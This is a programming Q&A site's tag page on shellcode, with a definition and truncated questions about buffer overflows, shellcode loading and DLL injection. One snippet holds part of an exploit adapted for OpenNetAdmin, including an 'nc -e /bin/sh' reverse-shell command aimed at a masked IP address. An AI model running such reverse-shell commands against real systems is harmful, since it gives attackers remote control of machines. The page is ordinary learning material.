Questions tagged [shellcode]

A shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability.

Shellcodes get that name because they typically start a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient.

Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).

681 questions

-1

votes

1 answer

Load shellcode from file to char* comes strange characters in end of text

I have a char array[] and is like following: // MessageBox char xcode[] =…

asked Oct 07 '20 at 01:52

user13342561

-1

votes

1 answer

Loading long shellcode in memory in C

I want my shellcode to run in x86 arch, but char array in C has a limit of ~16k, while my shellcode is longer. I broke the string on 2 arrays and started as follows: char n1qwgimnb8i[] = "\x75\x6d\xf2\x34..."; char n1qwgimnb8i1[] =…

c shellcode

asked Oct 02 '20 at 23:14

Anastasiya Egorova

-1

votes

1 answer

What if system call number were 0 in a buffer overflow attack?

I'm learning buffer overflow with shellcode. In a shellcode to spawn a shell by system call to execve(). Things like mov $0x0, %eax can be replaced by xor %eax, %eax to avoid NULL in shellcode. But there's a int $0x80. Is the number 0x80 a…

assembly x86 system-calls buffer-overflow shellcode

asked Sep 17 '20 at 10:53

1t3a

-1

votes

1 answer

manual mapping dll never execute my MessageBoxA function

I am basically manual mapping my dll into "notepad.exe" am resolving imports, fixing relocations and executing my shellcode in target process which is ("notepad.exe") which should call my dll entry point. The problem is I tried debugging it for…

windows assembly shellcode dll-injection

asked Jul 11 '20 at 12:12

zeroaceee

-1

votes

1 answer

How to run 64-bit shellcode on 32-bit Linux machine?

I have this shellcode that only runs on 64 bit machine: unsigned char shellcode[] =…

shellcode

asked Mar 28 '20 at 22:01

Mark

-1

votes

2 answers

Bash Syntax Problems for Exploit

I found an exploit at exploit-db for the OpenNetAdmin 18.1.1 I have to adjust this script so it work for me but I don't get this done. This is what I have so far: URL="xxx.xxx.xxx.xxx/ona" while true;do echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx…

linux bash syntax exploit shellcode

asked Jan 27 '20 at 08:51

Soteri

-1

votes

1 answer

Call a shellcode without using pointer to function?

Is there a way to get the return value of a function that is in the shellcode, without using pointer to function? #include unsigned char code[] = "\x55\x48\x89\xe5" "\xb8\x05\x00\x00" …

gcc assembly x86 shellcode

asked Jun 24 '19 at 02:56

Yuri Albuquerque

-1

votes

1 answer

Why can't i exit from shellcode with a syscall?

I try to make a Programm where you put in some assembled assembly in hex and run it. With simple instructions like int3 it works, but when I try to exit from the programm with a syscall it doesnt work. I assembled it with rasm2 mov eax, 1 mov ebx,…

c assembly x86 shellcode

asked May 11 '19 at 17:32

MaxSilvester

-1

votes

1 answer

Difference between two keywords while using grep in bash?

What is the output difference between these commands? ps -ef | grep \[t\]tyS1 and ps -ef | grep ttyS1 Expected results is that previous will grep for [t]tyS1 but is not actually happening.

bash shell unix shellcode

asked Jan 10 '19 at 08:24

Deb Paikar

-1

votes

2 answers

shellcode working , but no in a custom C program

my payload asm works , but I tried to embed to my own c program it works. conect to my nc port 4444 then brake the conection . I dont why this it happen if I tested this example on my asm executable and it works perfectly , but on my c program not.…

c payload shellcode

asked Nov 08 '18 at 04:49

user8706034

-1

votes

1 answer

Shellcode in the signal handler

Why won't my shellcode (int3) be hit with the signal handler? Apart from not like to have printf() in the handler, I care for how to deliver the shellcode (as not inline assembler) within the signal handler, being executed at runtime. However, I…

c signals shellcode

asked Oct 12 '18 at 10:36

Kasimir Voisin

-1

votes

2 answers

pointer casting in c [shellcode test]

I'm following a tutorial on how to write a shellcode but I'm failing to understand what this pointer function casting is doing to the bytecode, could someone explain this to me?. char code[] = "bytecode will go here!"; int main(int argc, char…

c shellcode

asked Jul 23 '18 at 07:59

Syched Flow

-1

votes

2 answers

Simple shellcode not working

I have the following code which is supposed to drop a shell, however, after I run the code nothing appears to happen. Here is the code that I have. This was taken from the shellcoder's handbook. ` char shellcode[] = …

c gcc shellcode

asked May 19 '18 at 20:26

user3431573

-1

votes

1 answer

Segmentation Fault during Exploit

I tried to execute a shellcode with buffer overflow. Unfortunately I get a segmentation error. In the following the c code asm code and exploit code: C Code: int main(int argc, char **argv) { char buffer[64]; gets(buffer); } ASM Code: …

segmentation-fault exploit shellcode

asked Apr 14 '18 at 20:58

elguerrero

-1

votes

1 answer

Running shellcode works in debugger, but not by itself

I'm experimenting with buffer overflows. I've written a toy example which does the following: building a buffer which consists of three parts: 1) a block with several "malicious" return addresses that overwrite the real return address on the…

c shellcode

asked Nov 21 '17 at 17:42

Andy

Prev 1 2 3

…

45 46 Next